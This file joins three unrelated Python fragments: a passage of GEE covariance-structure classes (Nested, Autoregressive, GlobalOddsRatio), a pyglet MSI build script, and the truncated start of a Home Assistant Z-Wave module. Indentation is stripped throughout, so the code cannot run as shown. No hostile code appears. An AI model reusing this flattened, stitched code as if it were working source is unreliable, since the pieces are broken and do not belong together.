residsq = np.tril(residsq, -1)
residsq_sum += residsq.sum()
nterm += 0.5 * ngrp * (ngrp - 1)
scale /= (nobs - dim)
self.dep_params = residsq_sum / (scale * (nterm - dim))
def covariance_matrix(self, expval, index):
dim = len(expval)
dp = self.dep_params * np.ones((dim, dim), dtype=np.float64)
return dp + (1. - self.dep_params) * np.eye(dim), True
def covariance_matrix_solve(self, expval, index, stdev, rhs):
k = len(expval)
c = self.dep_params / (1. - self.dep_params)
c /= 1. + self.dep_params * (k - 1)
rslt = []
for x in rhs:
if x.ndim == 1:
x1 = x / stdev
y = x1 / (1. - self.dep_params)
y -= c * sum(x1)
y /= stdev
else:
x1 = x / stdev[:, None]
y = x1 / (1. - self.dep_params)
y -= c * x1.sum(0)
y /= stdev[:, None]
rslt.append(y)
return rslt
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
covariance_matrix_solve.__doc__ = CovStruct.covariance_matrix_solve.__doc__
def summary(self):
return ("The correlation between two observations in the " +
"same cluster is %.3f" % self.dep_params)
class Nested(CovStruct):
"""
A nested working dependence structure.
A working dependence structure that captures a nested hierarchy of
groups, each level of which contributes to the random error term
of the model.
When using this working covariance structure, `dep_data` of the
GEE instance should contain a n_obs x k matrix of 0/1 indicators,
corresponding to the k subgroups nested under the top-level
`groups` of the GEE instance. These subgroups should be nested
from left to right, so that two observations with the same value
for column j of `dep_data` should also have the same value for all
columns j' < j (this only applies to observations in the same
top-level cluster given by the `groups` argument to GEE).
Example
-------
Suppose our data are student test scores, and the students are in
classrooms, nested in schools, nested in school districts. The
school district is the highest level of grouping, so the school
district id would be provided to GEE as `groups`, and the school
and classroom id's would be provided to the Nested class as the
`dep_data` argument, e.g.
0 0 # School 0, classroom 0, student 0
0 0 # School 0, classroom 0, student 1
0 1 # School 0, classroom 1, student 0
0 1 # School 0, classroom 1, student 1
1 0 # School 1, classroom 0, student 0
1 0 # School 1, classroom 0, student 1
1 1 # School 1, classroom 1, student 0
1 1 # School 1, classroom 1, student 1
Labels lower in the hierarchy are recycled, so that student 0 in
classroom 0 is different fro student 0 in classroom 1, etc.
Notes
-----
The calculations for this dependence structure involve all pairs
of observations within a group (that is, within the top level
`group` structure passed to GEE). Large group sizes will result
in slow iterations.
The variance components are estimated using least squares
regression of the products r*r', for standardized residuals r and
r' in the same group, on a vector of indicators defining which
variance components are shared by r and r'.
"""
def initialize(self, model):
"""
Called on the first call to update
`ilabels` is a list of n_i x n_i matrices containing integer
labels that correspond to specific correlation parameters.
Two elements of ilabels[i] with the same label share identical
variance components.
`designx` is a matrix, with each row containing dummy
variables indicating which variance components are associated
with the corresponding element of QY.
"""
super(Nested, self).initialize(model)
# A bit of processing of the nest data
id_matrix = np.asarray(self.model.dep_data)
if id_matrix.ndim == 1:
id_matrix = id_matrix[:,None]
self.id_matrix = id_matrix
endog = self.model.endog_li
designx, ilabels = [], []
# The number of layers of nesting
n_nest = self.id_matrix.shape[1]
for i in range(self.model.num_group):
ngrp = len(endog[i])
glab = self.model.group_labels[i]
rix = self.model.group_indices[glab]
# Determine the number of common variance components
# shared by each pair of observations.
ix1, ix2 = np.tril_indices(ngrp, -1)
ncm = (self.id_matrix[rix[ix1], :] ==
self.id_matrix[rix[ix2], :]).sum(1)
# This is used to construct the working correlation
# matrix.
ilabel = np.zeros((ngrp, ngrp), dtype=np.int32)
ilabel[[ix1, ix2]] = ncm + 1
ilabel[[ix2, ix1]] = ncm + 1
ilabels.append(ilabel)
# This is used to estimate the variance components.
dsx = np.zeros((len(ix1), n_nest+1), dtype=np.float64)
dsx[:,0] = 1
for k in np.unique(ncm):
ii = np.flatnonzero(ncm == k)
dsx[ii, 1:k+1] = 1
designx.append(dsx)
self.designx = np.concatenate(designx, axis=0)
self.ilabels = ilabels
svd = np.linalg.svd(self.designx, 0)
self.designx_u = svd[0]
self.designx_s = svd[1]
self.designx_v = svd[2].T
def update(self, params):
endog = self.model.endog_li
offset = self.model.offset_li
nobs = self.model.nobs
dim = len(params)
if self.designx is None:
self._compute_design(self.model)
cached_means = self.model.cached_means
varfunc = self.model.family.variance
dvmat = []
scale = 0.
for i in range(self.model.num_group):
expval, _ = cached_means[i]
stdev = np.sqrt(varfunc(expval))
resid = (endog[i] - offset[i] - expval) / stdev
ix1, ix2 = np.tril_indices(len(resid), -1)
dvmat.append(resid[ix1] * resid[ix2])
scale += np.sum(resid**2)
dvmat = np.concatenate(dvmat)
scale /= (nobs - dim)
# Use least squares regression to estimate the variance
# components
vcomp_coeff = np.dot(self.designx_v, np.dot(self.designx_u.T,
dvmat) / self.designx_s)
self.vcomp_coeff = np.clip(vcomp_coeff, 0, np.inf)
self.scale = scale
self.dep_params = self.vcomp_coeff.copy()
def covariance_matrix(self, expval, index):
dim = len(expval)
# First iteration
if self.dep_params is None:
return np.eye(dim, dtype=np.float64), True
ilabel = self.ilabels[index]
c = np.r_[self.scale, np.cumsum(self.vcomp_coeff)]
vmat = c[ilabel]
vmat /= self.scale
return vmat, True
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
def summary(self):
"""
Returns a summary string describing the state of the
dependence structure.
"""
msg = "Variance estimates\n------------------\n"
for k in range(len(self.vcomp_coeff)):
msg += "Component %d: %.3f\n" % (k+1, self.vcomp_coeff[k])
msg += "Residual: %.3f\n" % (self.scale -
np.sum(self.vcomp_coeff))
return msg
class Autoregressive(CovStruct):
"""
An autoregressive working dependence structure.
The dependence is defined in terms of the `time` component of the
parent GEE class. Time represents a potentially multidimensional
index from which distances between pairs of observations can be
determined. The correlation between two observations in the same
cluster is dep_params^distance, where `dep_params` is the
autocorrelation parameter to be estimated, and `distance` is the
distance between the two observations, calculated from their
corresponding time values. `time` is stored as an n_obs x k
matrix, where `k` represents the number of dimensions in the time
index.
The autocorrelation parameter is estimated using weighted
nonlinear least squares, regressing each value within a cluster on
each preceeding value in the same cluster.
Parameters
----------
dist_func: function from R^k x R^k to R^+, optional
A function that computes the distance between the two
observations based on their `time` values.
Reference
---------
B Rosner, A Munoz. Autoregressive modeling for the analysis of
longitudinal data with unequally spaced examinations. Statistics
in medicine. Vol 7, 59-71, 1988.
"""
def __init__(self, dist_func=None):
super(Autoregressive, self).__init__()
# The function for determining distances based on time
if dist_func is None:
self.dist_func = lambda x, y: np.abs(x - y).sum()
else:
self.dist_func = dist_func
self.designx = None
# The autocorrelation parameter
self.dep_params = 0.
def update(self, params):
endog = self.model.endog_li
time = self.model.time_li
# Only need to compute this once
if self.designx is not None:
designx = self.designx
else:
designx = []
for i in range(self.model.num_group):
ngrp = len(endog[i])
if ngrp == 0:
continue
# Loop over pairs of observations within a cluster
for j1 in range(ngrp):
for j2 in range(j1):
designx.append(self.dist_func(time[i][j1, :],
time[i][j2, :]))
designx = np.array(designx)
self.designx = designx
scale = self.model.estimate_scale()
varfunc = self.model.family.variance
cached_means = self.model.cached_means
# Weights
var = 1. - self.dep_params**(2*designx)
var /= 1. - self.dep_params**2
wts = 1. / var
wts /= wts.sum()
residmat = []
for i in range(self.model.num_group):
expval, _ = cached_means[i]
stdev = np.sqrt(scale * varfunc(expval))
resid = (endog[i] - expval) / stdev
ngrp = len(resid)
for j1 in range(ngrp):
for j2 in range(j1):
residmat.append([resid[j1], resid[j2]])
residmat = np.array(residmat)
# Need to minimize this
def fitfunc(a):
dif = residmat[:, 0] - (a**designx)*residmat[:, 1]
return np.dot(dif**2, wts)
# Left bracket point
b_lft, f_lft = 0., fitfunc(0.)
# Center bracket point
b_ctr, f_ctr = 0.5, fitfunc(0.5)
while f_ctr > f_lft:
b_ctr /= 2
f_ctr = fitfunc(b_ctr)
if b_ctr < 1e-8:
self.dep_params = 0
return
# Right bracket point
b_rgt, f_rgt = 0.75, fitfunc(0.75)
while f_rgt < f_ctr:
b_rgt = b_rgt + (1. - b_rgt) / 2
f_rgt = fitfunc(b_rgt)
if b_rgt > 1. - 1e-6:
raise ValueError(
"Autoregressive: unable to find right bracket")
from scipy.optimize import brent
self.dep_params = brent(fitfunc, brack=[b_lft, b_ctr, b_rgt])
def covariance_matrix(self, endog_expval, index):
ngrp = len(endog_expval)
if self.dep_params == 0:
return np.eye(ngrp, dtype=np.float64), True
idx = np.arange(ngrp)
cmat = self.dep_params**np.abs(idx[:, None] - idx[None, :])
return cmat, True
def covariance_matrix_solve(self, expval, index, stdev, rhs):
# The inverse of an AR(1) covariance matrix is tri-diagonal.
k = len(expval)
soln = []
# LHS has 1 column
if k == 1:
return [x / stdev**2 for x in rhs]
# LHS has 2 columns
if k == 2:
mat = np.array([[1, -self.dep_params], [-self.dep_params, 1]])
mat /= (1. - self.dep_params**2)
for x in rhs:
if x.ndim == 1:
x1 = x / stdev
else:
x1 = x / stdev[:, None]
x1 = np.dot(mat, x1)
if x.ndim == 1:
x1 /= stdev
else:
x1 /= stdev[:, None]
soln.append(x1)
return soln
# LHS has >= 3 columns: values c0, c1, c2 defined below give
# the inverse. c0 is on the diagonal, except for the first
# and last position. c1 is on the first and last position of
# the diagonal. c2 is on the sub/super diagonal.
c0 = (1. + self.dep_params**2) / (1. - self.dep_params**2)
c1 = 1. / (1. - self.dep_params**2)
c2 = -self.dep_params / (1. - self.dep_params**2)
soln = []
for x in rhs:
flatten = False
if x.ndim == 1:
x = x[:, None]
flatten = True
x1 = x / stdev[:, None]
z0 = np.zeros((1, x.shape[1]))
rhs1 = np.concatenate((x[1:,:], z0), axis=0)
rhs2 = np.concatenate((z0, x[0:-1,:]), axis=0)
y = c0*x + c2*rhs1 + c2*rhs2
y[0, :] = c1*x[0, :] + c2*x[1, :]
y[-1, :] = c1*x[-1, :] + c2*x[-2, :]
y /= stdev[:, None]
if flatten:
y = np.squeeze(y)
soln.append(y)
return soln
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
covariance_matrix_solve.__doc__ = CovStruct.covariance_matrix_solve.__doc__
def summary(self):
return ("Autoregressive(1) dependence parameter: %.3f\n" %
self.dep_params)
class GlobalOddsRatio(CovStruct):
"""
Estimate the global odds ratio for a GEE with ordinal or nominal
data.
References
----------
PJ Heagerty and S Zeger. "Marginal Regression Models for Clustered
Ordinal Measurements". Journal of the American Statistical
Association Vol. 91, Issue 435 (1996).
Thomas Lumley. Generalized Estimating Equations for Ordinal Data:
A Note on Working Correlation Structures. Biometrics Vol. 52,
No. 1 (Mar., 1996), pp. 354-361
http://www.jstor.org/stable/2533173
Notes:
------
The following data structures are calculated in the class:
'ibd' is a list whose i^th element ibd[i] is a sequence of integer
pairs (a,b), where endog_li[i][a:b] is the subvector of binary
indicators derived from the same ordinal value.
`cpp` is a dictionary where cpp[group] is a map from cut-point
pairs (c,c') to the indices of all between-subject pairs derived
from the given cut points.
"""
def __init__(self, endog_type):
super(GlobalOddsRatio, self).__init__()
self.endog_type = endog_type
self.dep_params = 0.
def initialize(self, model):
super(GlobalOddsRatio, self).initialize(model)
self.nlevel = len(model.endog_values)
self.ncut = self.nlevel - 1
ibd = []
for v in model.endog_li:
jj = np.arange(0, len(v) + 1, self.ncut)
ibd1 = np.hstack((jj[0:-1][:, None], jj[1:][:, None]))
ibd1 = [(jj[k], jj[k + 1]) for k in range(len(jj) - 1)]
ibd.append(ibd1)
self.ibd = ibd
# Need to restrict to between-subject pairs
cpp = []
for v in model.endog_li:
# Number of subjects in this group
m = int(len(v) / self.ncut)
cpp1 = {}
# Loop over distinct subject pairs
for i1 in range(m):
for i2 in range(i1):
# Loop over cut point pairs
for k1 in range(self.ncut):
for k2 in range(k1+1):
if (k2, k1) not in cpp1:
cpp1[(k2, k1)] = []
j1 = i1*self.ncut + k1
j2 = i2*self.ncut + k2
cpp1[(k2, k1)].append([j2, j1])
for k in cpp1.keys():
cpp1[k] = np.asarray(cpp1[k])
cpp.append(cpp1)
self.cpp = cpp
# Initialize the dependence parameters
self.crude_or = self.observed_crude_oddsratio()
self.dep_params = self.crude_or
def pooled_odds_ratio(self, tables):
"""
Returns the pooled odds ratio for a list of 2x2 tables.
The pooled odds ratio is the inverse variance weighted average
of the sample odds ratios of the tables.
"""
if len(tables) == 0:
return 1.
# Get the sampled odds ratios and variances
log_oddsratio, var = [], []
for table in tables:
lor = np.log(table[1, 1]) + np.log(table[0, 0]) -\
np.log(table[0, 1]) - np.log(table[1, 0])
log_oddsratio.append(lor)
var.append((1 / table.astype(np.float64)).sum())
# Calculate the inverse variance weighted average
wts = [1 / v for v in var]
wtsum = sum(wts)
wts = [w / wtsum for w in wts]
log_pooled_or = sum([w*e for w, e in zip(wts, log_oddsratio)])
return np.exp(log_pooled_or)
def covariance_matrix(self, expected_value, index):
vmat = self.get_eyy(expected_value, index)
vmat -= np.outer(expected_value, expected_value)
return vmat, False
def observed_crude_oddsratio(self):
"""
To obtain the crude (global) odds ratio, first pool all binary
indicators corresponding to a given pair of cut points (c,c'),
then calculate the odds ratio for this 2x2 table. The crude
odds ratio is the inverse variance weighted average of these
odds ratios. Since the covariate effects are ignored, this OR
will generally be greater than the stratified OR.
"""
cpp = self.cpp
endog = self.model.endog_li
# Storage for the contingency tables for each (c,c')
tables = {}
for ii in iterkeys(cpp[0]):
tables[ii] = np.zeros((2, 2), dtype=np.float64)
# Get the observed crude OR
for i in range(len(endog)):
# The observed joint values for the current cluster
yvec = endog[i]
endog_11 = np.outer(yvec, yvec)
endog_10 = np.outer(yvec, 1. - yvec)
endog_01 = np.outer(1. - yvec, yvec)
endog_00 = np.outer(1. - yvec, 1. - yvec)
cpp1 = cpp[i]
for ky in iterkeys(cpp1):
ix = cpp1[ky]
tables[ky][1, 1] += endog_11[ix[:, 0], ix[:, 1]].sum()
tables[ky][1, 0] += endog_10[ix[:, 0], ix[:, 1]].sum()
tables[ky][0, 1] += endog_01[ix[:, 0], ix[:, 1]].sum()
tables[ky][0, 0] += endog_00[ix[:, 0], ix[:, 1]].sum()
return self.pooled_odds_ratio(list(itervalues(tables)))
def get_eyy(self, endog_expval, index):
"""
Returns a matrix V such that V[i,j] is the joint probability
that endog[i] = 1 and endog[j] = 1, based on the marginal
probabilities of endog and the global odds ratio `current_or`.
"""
current_or = self.dep_params
ibd = self.ibd[index]
# The between-observation joint probabilities
if current_or == 1.0:
vmat = np.outer(endog_expval, endog_expval)
else:
psum = endog_expval[:, None] + endog_expval[None, :]
pprod = endog_expval[:, None] * endog_expval[None, :]
pfac = np.sqrt((1. + psum * (current_or - 1.))**2 +
4 * current_or * (1. - current_or) * pprod)
vmat = 1. + psum * (current_or - 1.) - pfac
vmat /= 2. * (current_or - 1)
# Fix E[YY'] for elements that belong to same observation
for bdl in ibd:
evy = endog_expval[bdl[0]:bdl[1]]
if self.endog_type == "ordinal":
eyr = np.outer(evy, np.ones(len(evy)))
eyc = np.outer(np.ones(len(evy)), evy)
vmat[bdl[0]:bdl[1], bdl[0]:bdl[1]] = \
np.where(eyr < eyc, eyr, eyc)
else:
vmat[bdl[0]:bdl[1], bdl[0]:bdl[1]] = np.diag(evy)
return vmat
def update(self, params):
"""
Update the global odds ratio based on the current value of
params.
"""
endog = self.model.endog_li
cpp = self.cpp
cached_means = self.model.cached_means
# This will happen if all the clusters have only
# one observation
if len(cpp[0]) == 0:
return
tables = {}
for ii in cpp[0]:
tables[ii] = np.zeros((2, 2), dtype=np.float64)
for i in range(self.model.num_group):
endog_expval, _ = cached_means[i]
emat_11 = self.get_eyy(endog_expval, i)
emat_10 = endog_expval[:, None] - emat_11
emat_01 = -emat_11 + endog_expval
emat_00 = 1. - (emat_11 + emat_10 + emat_01)
cpp1 = cpp[i]
for ky in iterkeys(cpp1):
ix = cpp1[ky]
tables[ky][1, 1] += emat_11[ix[:, 0], ix[:, 1]].sum()
tables[ky][1, 0] += emat_10[ix[:, 0], ix[:, 1]].sum()
tables[ky][0, 1] += emat_01[ix[:, 0], ix[:, 1]].sum()
tables[ky][0, 0] += emat_00[ix[:, 0], ix[:, 1]].sum()
cor_expval = self.pooled_odds_ratio(list(itervalues(tables)))
self.dep_params *= self.crude_or / cor_expval
if not np.isfinite(self.dep_params):
self.dep_params = 1.
warnings.warn("dep_params became inf, resetting to 1",
ConvergenceWarning)
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
def summary(self):
return "Global odds ratio: %.3f\n" % self.dep_params
|
|
# 2. Create build/pyglet.wxs from pyglet.wxs, add all file components
# 3. Run candle and light on build/pyglet.wxs to generate
# ../../dist/pyglet.msi
import os
import re
import shutil
import subprocess
from uuid import uuid1
from xml.dom.minidom import parse
import pkg_resources
class PythonVersion(object):
def __init__(self, version, key_root, display_version):
self.version = version
self.display_version = display_version
self.id = 'PY' + version.replace('.', '') + key_root
self.key_root = key_root
self.key = r'SOFTWARE\Python\PythonCore\%s\InstallPath' % version
self.dir_prop = 'PYTHONHOME%s' % self.id
self.exe_prop = 'PYTHONEXE%s' % self.id
self.components = []
PYTHON_VERSIONS = (
PythonVersion('2.4', 'HKLM', 'Python 2.4'),
PythonVersion('2.5', 'HKLM', 'Python 2.5'),
PythonVersion('2.6', 'HKLM', 'Python 2.6'),
PythonVersion('2.4', 'HKCU', 'Python 2.4 (current user only)'),
PythonVersion('2.5', 'HKCU', 'Python 2.5 (current user only)'),
PythonVersion('2.6', 'HKCU', 'Python 2.6 (current user only)'),
)
MISSING_PYTHON_MESSAGE = 'pyglet requires Python 2.4 or later. The ' \
'installation will be aborted.'
exclude_packages = []
ids = set()
def id(name):
num = 1
id = name
while id in ids:
num += 1
id = '%s%d' % (name, num)
ids.add(id)
return id
shortnames = set()
def shortname(name, ext):
num = 1
shortname = '%s.%s' % (name[:8], ext)
while shortname in shortnames:
num += 1
shortname = '%s%02d.%s' % (name[:6], num, ext)
shortnames.add(shortname)
return shortname
def node(doc, node_name, **kwargs):
node = doc.createElement(node_name)
for key, value in kwargs.items():
node.setAttribute(key, value)
return node
def add_package(name, src_dir, doc, dest_node, pyver):
if name in exclude_packages:
return
src_path = os.path.join(src_dir, name)
directory = node(doc, 'Directory',
Id=id('%sDir' % name),
Name=name)
dest_node.appendChild(doc.createTextNode('\n\n'))
dest_node.appendChild(directory)
dest_node.appendChild(doc.createTextNode('\n\n'))
directory.appendChild(doc.createTextNode('\n'))
for filename in os.listdir(src_path):
file_path = os.path.join(src_path, filename)
if os.path.isdir(file_path):
if os.path.exists(os.path.join(file_path, '__init__.py')):
add_package(filename, src_path, doc, directory, pyver)
elif filename.endswith('.py'):
add_module(filename, src_path, doc, directory, pyver)
def component_id(name, pyver):
component = id(name)
pyver.components.append(component)
return component
guid_seq = 0
def guid():
global guid_seq
guid_seq += 1
return uuid1(clock_seq=guid_seq).hex.upper()
def add_module(name, src_dir, doc, dest_node, pyver):
src_path = os.path.join(src_dir, name)
basefile = os.path.splitext(name)[0]
component = node(doc, 'Component',
Id= component_id('%sComponent' % basefile, pyver),
Guid=guid())
component.appendChild(
node(doc, 'File',
Id=id('%sPy' % basefile),
Name=name,
DiskId='1',
Source=src_path))
component.appendChild(
node(doc, 'RemoveFile',
Id=id('%sPyc' % basefile),
Name='%s.pyc' % basefile,
On='uninstall'))
component.appendChild(
node(doc, 'RemoveFile',
Id=id('%sPyo' % basefile),
Name='%s.pyo' % basefile,
On='uninstall'))
dest_node.appendChild(component)
# Some readability
dest_node.appendChild(doc.createTextNode('\n'))
def call(cmd):
print cmd
return subprocess.call(cmd, shell=True)
if __name__ == '__main__':
script_dir = os.path.dirname(__file__)
root_dir = os.path.join(script_dir, '../..')
dist_dir = os.path.join(root_dir, 'dist')
try:
os.makedirs(dist_dir)
except OSError:
pass
# Copy current avbin into res
shutil.copyfile('c:/windows/system32/avbin.dll',
os.path.join(script_dir, 'res', 'avbin.dll'))
# Determine release version from setup.py
version_re = re.compile("VERSION = '([^']*)'")
for line in open(os.path.join(root_dir, 'setup.py')):
match = version_re.match(line)
if match:
version = match.groups()[0]
# Create a Windows-friendly dotted number for the version
# Version string must not have any letters, so use:
# alpha = x.x.x.(0 + alpha num)
# beta = x.x.x.(16 + beta num)
# rc = x.x.x.(32 + rc num)
# release = x.x.x.128 -->
parts = list(pkg_resources.parse_version(version))
major = int(parts.pop(0))
minor = patch = tagnum = 0
if parts[0][0] != '*':
minor = int(parts.pop(0))
if parts[0][0] != '*':
patch = int(parts.pop(0))
tag = parts.pop(0)
if tag == '*alpha':
base = 0
elif tag == '*beta':
base = 16
elif tag == '*rc':
base = 32
elif tag == '*final':
base = 128
else:
assert False, 'Unrecognised version tag "%s"' % tag
if parts and parts[0][0] != '*':
tagnum = int(parts.pop(0))
assert not parts or parts[0] == '*final'
version_windows = '%d.%d.%d.%d' % (major, minor, patch, base + tagnum)
print 'Version %s is Windows version %s' % (version, version_windows)
print 'Writing pyglet.wxs'
# Open template wxs and find Product element
wxs = parse(os.path.join(script_dir, 'pyglet.in.wxs'))
Product = wxs.getElementsByTagName('Product')[0]
Product.setAttribute('Version', version_windows)
# Add Python discovery
for pyver in PYTHON_VERSIONS:
Property = node(wxs, 'Property',
Id=pyver.dir_prop)
Property.appendChild(
node(wxs, 'RegistrySearch',
Id='%sRegSearch' % pyver.dir_prop,
Root=pyver.key_root,
Key=pyver.key,
Type='directory'))
Product.appendChild(Property)
# Add install conditional on at least one Python version present.
Condition = node(wxs, 'Condition',
Message=MISSING_PYTHON_MESSAGE)
Condition.appendChild(wxs.createTextNode(
' or '.join([pyver.dir_prop for pyver in PYTHON_VERSIONS])))
Product.appendChild(Condition)
# Get TARGETDIR Directory element
for elem in wxs.getElementsByTagName('Directory'):
if elem.getAttribute('Id') == 'TARGETDIR':
target_dir = elem
break
# Create entire set of components for each python version (WiX 3 will
# ensure only one copy of the source file is in the archive)
for pyver in PYTHON_VERSIONS:
python_home = node(wxs, 'Directory',
Id=pyver.dir_prop)
target_dir.appendChild(python_home)
lib_dir = node(wxs, 'Directory',
Id='%sLibDir' % pyver.dir_prop,
Name='Lib')
python_home.appendChild(lib_dir)
site_packages = node(wxs, 'Directory',
Id='%sSitePackages' % pyver.dir_prop,
Name='site-packages')
lib_dir.appendChild(site_packages)
add_package('pyglet', root_dir, wxs, site_packages, pyver)
# Add all components to features
RuntimeFeature = wxs.getElementsByTagName('Feature')[0]
for pyver in PYTHON_VERSIONS:
feature = node(wxs, 'Feature',
Id='RuntimeFeature%s' % pyver.id,
Title='pyglet runtime for %s' % pyver.display_version,
Level='1',
AllowAdvertise='no')
condition = node(wxs, 'Condition',
Level='0')
condition.appendChild(wxs.createTextNode('NOT ' + pyver.dir_prop))
feature.appendChild(condition)
for component in pyver.components:
feature.appendChild(node(wxs, 'ComponentRef',
Id=component))
feature.appendChild(wxs.createTextNode('\n'))
RuntimeFeature.appendChild(feature)
# Add byte compilation custom actions
last_action = 'InstallFinalize'
InstallExecuteSequence = \
wxs.getElementsByTagName('InstallExecuteSequence')[0]
UI = wxs.getElementsByTagName('UI')[0]
for pyver in PYTHON_VERSIONS:
# Actions are conditional on the feature being installed
def cond(node):
node.appendChild(wxs.createTextNode(
'(&RuntimeFeature%s=3) AND NOT(!RuntimeFeature%s=3)' % (
pyver.id, pyver.id)))
return node
# Define the actions
Product.appendChild(node(wxs, 'CustomAction',
Id='SetPythonExe%s' % pyver.id,
Property=pyver.exe_prop,
Value=r'[%s]\pythonw.exe' % pyver.dir_prop))
Product.appendChild(node(wxs, 'CustomAction',
Id='ByteCompile%s' % pyver.id,
Property=pyver.exe_prop,
ExeCommand=r'-c "import compileall; compileall.compile_dir(\"[%s]\Lib\site-packages\pyglet\", force=1)"' % pyver.dir_prop,
Return='ignore'))
Product.appendChild(node(wxs, 'CustomAction',
Id='ByteOptimize%s' % pyver.id,
Property=pyver.exe_prop,
ExeCommand=r'-OO -c "import compileall; compileall.compile_dir(\"[%s]\Lib\site-packages\pyglet\", force=1)"' % pyver.dir_prop,
Return='ignore'))
# Schedule execution of these actions
InstallExecuteSequence.appendChild(cond(
node(wxs, 'Custom',
Action='SetPythonExe%s' % pyver.id,
After=last_action)))
InstallExecuteSequence.appendChild(cond(
node(wxs, 'Custom',
Action='ByteCompile%s' % pyver.id,
After='SetPythonExe%s' % pyver.id)))
InstallExecuteSequence.appendChild(cond(
node(wxs, 'Custom',
Action='ByteOptimize%s' % pyver.id,
After='ByteCompile%s' % pyver.id)))
last_action = 'ByteOptimize%s' % pyver.id
# Set progress text for the actions
progress = node(wxs, 'ProgressText',
Action='ByteCompile%s' % pyver.id)
progress.appendChild(wxs.createTextNode(
'Byte-compiling modules for Python %s' % pyver.version))
UI.appendChild(progress)
progress = node(wxs, 'ProgressText',
Action='ByteOptimize%s' % pyver.id)
progress.appendChild(wxs.createTextNode(
'Byte-optimizing modules for Python %s' % pyver.version))
UI.appendChild(progress)
# Write wxs file
wxs.writexml(open(os.path.join(script_dir, 'pyglet.wxs'), 'w'))
# Compile
call('candle -out %s %s' % (os.path.join(script_dir, 'pyglet.wixobj'),
os.path.join(script_dir, 'pyglet.wxs')))
# Link
call('light -sval -out %s %s' % \
(os.path.join(dist_dir, 'pyglet-%s.msi' % version),
os.path.join(script_dir, 'pyglet.wixobj')))
|
|
"""Support for Z-Wave."""
# pylint: disable=import-outside-toplevel
import asyncio
import copy
from importlib import import_module
import logging
from pprint import pprint
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_NAME,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import CoreState, callback
from homeassistant.helpers import discovery
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.device_registry import (
async_get_registry as async_get_device_registry,
)
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.entity_component import DEFAULT_SCAN_INTERVAL
from homeassistant.helpers.entity_platform import EntityPlatform
from homeassistant.helpers.entity_registry import (
async_entries_for_config_entry,
async_get_registry as async_get_entity_registry,
)
from homeassistant.helpers.entity_values import EntityValues
from homeassistant.helpers.event import async_track_time_change
from homeassistant.util import convert
import homeassistant.util.dt as dt_util
from . import const, websocket_api as wsapi, workaround
from .const import (
CONF_AUTOHEAL,
CONF_CONFIG_PATH,
CONF_DEBUG,
CONF_NETWORK_KEY,
CONF_POLLING_INTERVAL,
CONF_USB_STICK_PATH,
DATA_DEVICES,
DATA_ENTITY_VALUES,
DATA_NETWORK,
DATA_ZWAVE_CONFIG,
DEFAULT_CONF_AUTOHEAL,
DEFAULT_CONF_USB_STICK_PATH,
DEFAULT_DEBUG,
DEFAULT_POLLING_INTERVAL,
DOMAIN,
)
from .discovery_schemas import DISCOVERY_SCHEMAS
from .node_entity import ZWaveBaseEntity, ZWaveNodeEntity
from .util import (
check_has_unique_id,
check_node_schema,
check_value_schema,
is_node_parsed,
node_device_id_and_name,
node_name,
)
_LOGGER = logging.getLogger(__name__)
CLASS_ID = "class_id"
ATTR_POWER = "power_consumption"
CONF_POLLING_INTENSITY = "polling_intensity"
CONF_IGNORED = "ignored"
CONF_INVERT_OPENCLOSE_BUTTONS = "invert_openclose_buttons"
CONF_INVERT_PERCENT = "invert_percent"
CONF_REFRESH_VALUE = "refresh_value"
CONF_REFRESH_DELAY = "delay"
CONF_DEVICE_CONFIG = "device_config"
CONF_DEVICE_CONFIG_GLOB = "device_config_glob"
CONF_DEVICE_CONFIG_DOMAIN = "device_config_domain"
DATA_ZWAVE_CONFIG_YAML_PRESENT = "zwave_config_yaml_present"
DEFAULT_CONF_IGNORED = False
DEFAULT_CONF_INVERT_OPENCLOSE_BUTTONS = False
DEFAULT_CONF_INVERT_PERCENT = False
DEFAULT_CONF_REFRESH_VALUE = False
DEFAULT_CONF_REFRESH_DELAY = 5
PLATFORMS = [
"binary_sensor",
"climate",
"cover",
"fan",
"lock",
"light",
"sensor",
"switch",
]
RENAME_NODE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(ATTR_NAME): cv.string,
vol.Optional(const.ATTR_UPDATE_IDS, default=False): cv.boolean,
}
)
RENAME_VALUE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_VALUE_ID): vol.Coerce(int),
vol.Required(ATTR_NAME): cv.string,
vol.Optional(const.ATTR_UPDATE_IDS, default=False): cv.boolean,
}
)
SET_CONFIG_PARAMETER_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_CONFIG_PARAMETER): vol.Coerce(int),
vol.Required(const.ATTR_CONFIG_VALUE): vol.Any(vol.Coerce(int), cv.string),
vol.Optional(const.ATTR_CONFIG_SIZE, default=2): vol.Coerce(int),
}
)
SET_NODE_VALUE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_VALUE_ID): vol.Any(vol.Coerce(int), cv.string),
vol.Required(const.ATTR_CONFIG_VALUE): vol.Any(vol.Coerce(int), cv.string),
}
)
REFRESH_NODE_VALUE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_VALUE_ID): vol.Coerce(int),
}
)
SET_POLL_INTENSITY_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_VALUE_ID): vol.Coerce(int),
vol.Required(const.ATTR_POLL_INTENSITY): vol.Coerce(int),
}
)
PRINT_CONFIG_PARAMETER_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
